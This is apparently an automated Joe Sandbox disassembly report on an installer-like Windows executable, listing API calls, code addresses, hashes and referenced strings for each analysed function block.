• Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
• String ID:
• API String ID: 3527656728-0
• Opcode ID: af92fd76f0ea33d52ebd072e8e43ea1c00ff5cbe0803c9f3aa53dd55169beb2c
• Instruction ID: 2be34f36c4bf399c8fa5e8a938e63ded300dcfd20fe04f8c9e05bbd916d2a40e
• Opcode Fuzzy Hash: af92fd76f0ea33d52ebd072e8e43ea1c00ff5cbe0803c9f3aa53dd55169beb2c
• Instruction Fuzzy Hash: 84F0BFB1511101ABCE00FFBAD9CAE4B27A89F443097048057B944DF19BC63CDC504B3E
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 00471F9E
• 73A259E0.USER32(00000000,000000FC,00471EFC,00000000,0047212E,?,00000000,00472153), ref: 00471FC5
• GetACP.KERNEL32(00000000,0047212E,?,00000000,00472153), ref: 00472002
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00472048
Strings
Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: A259ClassInfoMessageSend
• String ID: COMBOBOX
• API String ID: 3217714596-1136563877
• Opcode ID: a3bd4216b25518833be08f838b902464fe38388dc9eea001a84ca35ef0d36fcc
• Instruction ID: 8d6e69cdc7b25736ecace23fa1d294beb101704f1944a8432741b73acccf4278
• Opcode Fuzzy Hash: a3bd4216b25518833be08f838b902464fe38388dc9eea001a84ca35ef0d36fcc
• Instruction Fuzzy Hash: 1D513E34A002459FCB10DF69D985A9DB7F5FB49304F51C0BAE908AB762C778AD41CB58
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,AI,_iu,?,00000000,0045237A), ref: 0045232F
• CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,AI,_iu,?,00000000,0045237A), ref: 0045233F
Strings
Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: CloseCreateFileHandle
• String ID: .tmp$AI$_iu
• API String ID: 3498533004-3125386451
• Opcode ID: c39a4d1d708061c95ee7f24ecf83207fce97cc026b21afb8cbe7964c222690aa
• Instruction ID: 46d0d6ad35c06494b98f164fbe74fb59b710500a089b477c7385efe511c505c8
• Opcode Fuzzy Hash: c39a4d1d708061c95ee7f24ecf83207fce97cc026b21afb8cbe7964c222690aa
• Instruction Fuzzy Hash: 6F31B370A00219ABCB11EBA5C942B9EB7B5AF45309F20447BFD00B73C2D6785F0587AC
Uniqueness
Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 00424234: SetWindowTextA.USER32(?,00000000), ref: 0042424C
                                                                          • ShowWindow.USER32(?,00000005,00000000,00491E79,?,?,00000000), ref: 00491C4A
                                                                            • Part of subcall function 0042D7A0: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D7B3
                                                                            • Part of subcall function 00407210: SetCurrentDirectoryA.KERNEL32(00000000,?,00491C72,00000000,00491E45,?,?,00000005,00000000,00491E79,?,?,00000000), ref: 0040721B
                                                                            • Part of subcall function 0042D328: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D3B6,?,?,00000000,?,?,00491C7C,00000000,00491E45,?,?,00000005), ref: 0042D35D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                          • String ID: .dat$.msg$IMsg$Uninstall
                                                                          • API String ID: 3312786188-1660910688
                                                                          • Opcode ID: adcb6d261caac1f1c681534649e4f7bd50fa4d1ea24911b293324070d9d119a1
                                                                          • Instruction ID: 53767b7cbe00aacee5155422e2e832e8fb1e8c52b774a8ea4378669dcc18a7ad
                                                                          • Opcode Fuzzy Hash: adcb6d261caac1f1c681534649e4f7bd50fa4d1ea24911b293324070d9d119a1
                                                                          • Instruction Fuzzy Hash: 6B31C574A006059FCB11EF65CC52D5E7BB5FB85304F60857AF800AB7A1DB78AD00CB58
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RtlInitializeCriticalSection.KERNEL32(00494420,00000000,00401A82,?,?,0040222E,021771FC,00001B1C,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                          • RtlEnterCriticalSection.KERNEL32(00494420,00494420,00000000,00401A82,?,?,0040222E,021771FC,00001B1C,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                          • LocalAlloc.KERNEL32(00000000,00000FF8,00494420,00000000,00401A82,?,?,0040222E,021771FC,00001B1C,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                          • RtlLeaveCriticalSection.KERNEL32(00494420,00401A89,00000000,00401A82,?,?,0040222E,021771FC,00001B1C,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                          • String ID: dIe
                                                                          • API String ID: 730355536-2902252405
                                                                          • Opcode ID: b56a4cd114446b0773a66c7a27bb32d6b05b92adddc21732bf39a310c4c109fc
                                                                          • Instruction ID: aa962e87e2017aa174224405feb2f066e475dbd7097569f409cdfcf28ecb4bd2
                                                                          • Opcode Fuzzy Hash: b56a4cd114446b0773a66c7a27bb32d6b05b92adddc21732bf39a310c4c109fc
                                                                          • Instruction Fuzzy Hash: E401AD706442405EEB19AB69E812F253ED4D7D574CF11843BF540A6AF1C67C4843CB2D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 00472DB8
                                                                          • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00472EAF,00494F8C,00000000), ref: 00472DCB
                                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00472DD1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProcProcessThreadWindow
                                                                          • String ID: AllowSetForegroundWindow$user32.dll
                                                                          • API String ID: 1782028327-3855017861
                                                                          • Opcode ID: c43b6504bda33aa8a25e434dc5dae65070d08f477b8a573627ea55408e2f79eb
                                                                          • Instruction ID: 0d6554dd73869eefd80f1f1d64911f0ce37f8ea1c6ebe10b7f66a80c05d08a0e
                                                                          • Opcode Fuzzy Hash: c43b6504bda33aa8a25e434dc5dae65070d08f477b8a573627ea55408e2f79eb
                                                                          • Instruction Fuzzy Hash: C7D0C7A16057016AD97077F5CE47DDF229CCD84755B14C43F7408F6186DABCE801997D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • BeginPaint.USER32(00000000,?), ref: 00416BC2
                                                                          • SaveDC.GDI32(?), ref: 00416BF3
                                                                          • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416CB5), ref: 00416C54
                                                                          • RestoreDC.GDI32(?,?), ref: 00416C7B
                                                                          • EndPaint.USER32(00000000,?,00416CBC,00000000,00416CB5), ref: 00416CAF
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                          • String ID:
                                                                          • API String ID: 3808407030-0
                                                                          • Opcode ID: c06abe95da4831753d63b9634986ca39a884699dacb8f14d7531f4240f3d7fe3
                                                                          • Instruction ID: 41fb8ea60d97978a9acdf236596d3a8a0d8a1996066437b2b943a95edf1585a8
                                                                          • Opcode Fuzzy Hash: c06abe95da4831753d63b9634986ca39a884699dacb8f14d7531f4240f3d7fe3
                                                                          • Instruction Fuzzy Hash: BF414E70A042049FDB14DB99C989FAA77F9EB48304F1580AEE4459B362D778DD40CB58
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 50d6a748b1b1338860e82f27f8761871ff193d734180217a0f8d82b491afa6e7
                                                                          • Instruction ID: 41a7722d09b35ce9ade17cd18fdec9692d257bae8bd1aa266952c484067d5cda
                                                                          • Opcode Fuzzy Hash: 50d6a748b1b1338860e82f27f8761871ff193d734180217a0f8d82b491afa6e7
                                                                          • Instruction Fuzzy Hash: D3311F746047409FC320EB69C584BABB7E8AF89714F04991EF9E5C7791D738EC818B19
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429778
                                                                          • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 004297A7
                                                                          • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 004297C3
                                                                          • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 004297EE
                                                                          • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 0042980C
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID:
                                                                          • API String ID: 3850602802-0
                                                                          • Opcode ID: fe9210cf49636514123fe8028928f87ce2f158866a525e02be5b173165c2f537
                                                                          • Instruction ID: 5c059f72bad19c8464015bcf3ba3f3fa2ba546ca9f5ab3c2e37583cf1b766786
                                                                          • Opcode Fuzzy Hash: fe9210cf49636514123fe8028928f87ce2f158866a525e02be5b173165c2f537
                                                                          • Instruction Fuzzy Hash: 2E217F70710714BAE710ABA6DC82F5B77ACEB46708F90443EB501BB3D2DB78AD41865C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetSystemMetrics.USER32(0000000B), ref: 0041BB3A
                                                                          • GetSystemMetrics.USER32(0000000C), ref: 0041BB44
                                                                          • 73A1A570.USER32(00000000,00000001,0000000C,0000000B,?,?), ref: 0041BB82
                                                                          • 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BCED,?,00000000,00000001,0000000C,0000000B,?,?), ref: 0041BBC9
                                                                          • DeleteObject.GDI32(00000000), ref: 0041BC0A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: MetricsSystem$A26310A570DeleteObject
                                                                          • String ID:
                                                                          • API String ID: 4277397052-0
                                                                          • Opcode ID: cb0e2adf6529593e89f90c831e9305c3e05f521d232314fc64d16b3fc11dbc77
                                                                          • Instruction ID: e64c8cfb77975bfe1c5019289902123c5e37d94f13133d85ba8c481b6df62587
                                                                          • Opcode Fuzzy Hash: cb0e2adf6529593e89f90c831e9305c3e05f521d232314fc64d16b3fc11dbc77
                                                                          • Instruction Fuzzy Hash: 91316F74E00609EFDB00DFA5C941AAEB7F4EB48700F10846AF510AB781D7389E80DB98
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 0045B370: SetLastError.KERNEL32(00000057,00000000,0045B43C,?,?,?,?,00000000), ref: 0045B3DB
                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,0046EED0,?,?,00000001,004950AC), ref: 0046EE89
                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,0046EED0,?,?,00000001,004950AC), ref: 0046EE9F
                                                                          Strings
                                                                          • Setting permissions on registry key: %s\%s, xrefs: 0046EE4E
                                                                          • Could not set permissions on the registry key because it currently does not exist., xrefs: 0046EE93
                                                                          • Failed to set permissions on registry key (%d)., xrefs: 0046EEB0
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                                          • API String ID: 1452528299-4018462623
                                                                          • Opcode ID: 55a67c74d7be1f49e0db02a0eeb01d23dee57b17d7fb2968d2e0597982d68bfc
                                                                          • Instruction ID: df05376805d2ea433cd9e8d9b9222adeaa9c52dcffddc60509e69f4445759fc8
                                                                          • Opcode Fuzzy Hash: 55a67c74d7be1f49e0db02a0eeb01d23dee57b17d7fb2968d2e0597982d68bfc
                                                                          • Instruction Fuzzy Hash: 4621F534A046445FCF00DBAAC8816AEBBF5DB49314F50417BF404E7392E7795D058B6E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                          • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                                          • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide$AllocString
                                                                          • String ID:
                                                                          • API String ID: 262959230-0
                                                                          • Opcode ID: bbd83879051bbb61c82a419d540aea94b1d83442c47b8cdfd9cb13069dd9a881
                                                                          • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                                          • Opcode Fuzzy Hash: bbd83879051bbb61c82a419d540aea94b1d83442c47b8cdfd9cb13069dd9a881
                                                                          • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • 73A18830.GDI32(00000000,00000000,00000000), ref: 00414389
                                                                          • 73A122A0.GDI32(00000000,00000000,00000000,00000000), ref: 00414391
                                                                          • 73A18830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 004143A5
                                                                          • 73A122A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 004143AB
                                                                          • 73A1A480.USER32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 004143B6
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: A122A18830$A480
                                                                          • String ID:
                                                                          • API String ID: 3325508737-0
                                                                          • Opcode ID: 194e3fff164acdd9274630c615ac113e6c237e1a8584744cad8ee02aea33715e
                                                                          • Instruction ID: 94861c3129a932f854b236b0087f7367a4de39103189020794ca85cb03cdcc47
                                                                          • Opcode Fuzzy Hash: 194e3fff164acdd9274630c615ac113e6c237e1a8584744cad8ee02aea33715e
                                                                          • Instruction Fuzzy Hash: 6F01DF7121C3806AD200B63E8C85A9F6BED8FCA314F15556EF498DB382CA7ACC018765
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,00476895,?,00000000,00000000,00000001,00000000,00475339,?,00000000), ref: 004752FD
                                                                          Strings
                                                                          • Failed to parse "reg" constant, xrefs: 00475304
                                                                          • XPG, xrefs: 00475196
                                                                          • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 00475171
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant$XPG
                                                                          • API String ID: 3535843008-221462518
                                                                          • Opcode ID: 2ad844ec3d3387f5df215a59a8183cae574ced7ce954c6da98f45587ceaedfea
                                                                          • Instruction ID: efa73f53bf694626ca38b284cffe8b81a50960838d42bcbe4388b938de67f833
                                                                          • Opcode Fuzzy Hash: 2ad844ec3d3387f5df215a59a8183cae574ced7ce954c6da98f45587ceaedfea
                                                                          • Instruction Fuzzy Hash: 2C814174E00548AFCB10EF95C881ADEBBF9AF44355F50816AE814FB391D778AE05CB98
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 0041EFE4: GetActiveWindow.USER32 ref: 0041EFE7
                                                                            • Part of subcall function 0041EFE4: GetCurrentThreadId.KERNEL32 ref: 0041EFFC
                                                                            • Part of subcall function 0041EFE4: 73A25940.USER32(00000000,Function_0001EFC0), ref: 0041F002
                                                                            • Part of subcall function 00423118: GetSystemMetrics.USER32(00000000), ref: 0042311A
                                                                          • OffsetRect.USER32(?,?,?), ref: 00424D39
                                                                          • DrawTextA.USER32(00000000,00000000,000000FF,?,00000C10), ref: 00424DFC
                                                                          • OffsetRect.USER32(?,?,?), ref: 00424E0D
                                                                            • Part of subcall function 004234D4: GetCurrentThreadId.KERNEL32 ref: 004234E9
                                                                            • Part of subcall function 004234D4: SetWindowsHookExA.USER32(00000003,00423490,00000000,00000000), ref: 004234F9
                                                                            • Part of subcall function 004234D4: CreateThread.KERNEL32(00000000,000003E8,00423440,00000000,00000000), ref: 0042351D
                                                                            • Part of subcall function 00424A9C: SetTimer.USER32(00000000,00000001,?,00423424), ref: 00424AB7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$CurrentOffsetRect$A25940ActiveCreateDrawHookMetricsSystemTextTimerWindowWindows
                                                                          • String ID: KB
                                                                          • API String ID: 1906964682-1869488878
                                                                          • Opcode ID: ba4daf257325cbcca7612a03de97b8ebc6b1ca257ff465a9f0c405e7408712a1
                                                                          • Instruction ID: ae1ca80dbbb80d562d58c988e2a096fec0eb4d76cb14d5a08aa48516f4e8acc9
                                                                          • Opcode Fuzzy Hash: ba4daf257325cbcca7612a03de97b8ebc6b1ca257ff465a9f0c405e7408712a1
                                                                          • Instruction Fuzzy Hash: 89811771A002189FDB14DFA8D884ADEBBB5FF48314F5045AAE904AB296DB38AD45CF44
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 00406F6B
                                                                          • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 00406FE5
                                                                          • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 0040703D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Enum$NameOpenResourceUniversal
                                                                          • String ID: Z
                                                                          • API String ID: 3604996873-1505515367
                                                                          • Opcode ID: 3e23b715a30e1b5c3429261b8d124dbcf9289215ab71e09fab44fa3001b00485
                                                                          • Instruction ID: 7c0b9131d06079f5eec8a494c30c5fea0581ab0ea086ea85159b160c15df41a2
                                                                          • Opcode Fuzzy Hash: 3e23b715a30e1b5c3429261b8d124dbcf9289215ab71e09fab44fa3001b00485
                                                                          • Instruction Fuzzy Hash: FB514170E042099FDB11EF55C941A9EBBB9FB09304F5041BAE540BB3D1C778AE418F5A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SetRectEmpty.USER32(?), ref: 0044C8E2
                                                                          • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044C90D
                                                                          • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044C995
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: DrawText$EmptyRect
                                                                          • String ID:
                                                                          • API String ID: 182455014-2867612384
                                                                          • Opcode ID: d0c3e2c7287d8feafc52a027ec46cb3325a20517415fc8e523dc578fc7dbd799
                                                                          • Instruction ID: 131ceb366f2beb704c5e67361b9b215d261598caf296ae96956cdec3368353cb
                                                                          • Opcode Fuzzy Hash: d0c3e2c7287d8feafc52a027ec46cb3325a20517415fc8e523dc578fc7dbd799
                                                                          • Instruction Fuzzy Hash: 8F5172B1900248AFDB50DFA9C885BDEBBF9FF48314F08447AE845EB252D7389944CB64
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • 73A1A570.USER32(00000000,00000000,0042EA1C,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042E8F2
                                                                            • Part of subcall function 0041A158: CreateFontIndirectA.GDI32(?), ref: 0041A217
                                                                          • SelectObject.GDI32(?,00000000), ref: 0042E915
                                                                          • 73A1A480.USER32(00000000,?,0042EA01,00000000,0042E9FA,?,00000000,00000000,0042EA1C,?,?,?,?,00000000,00000000,00000000), ref: 0042E9F4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
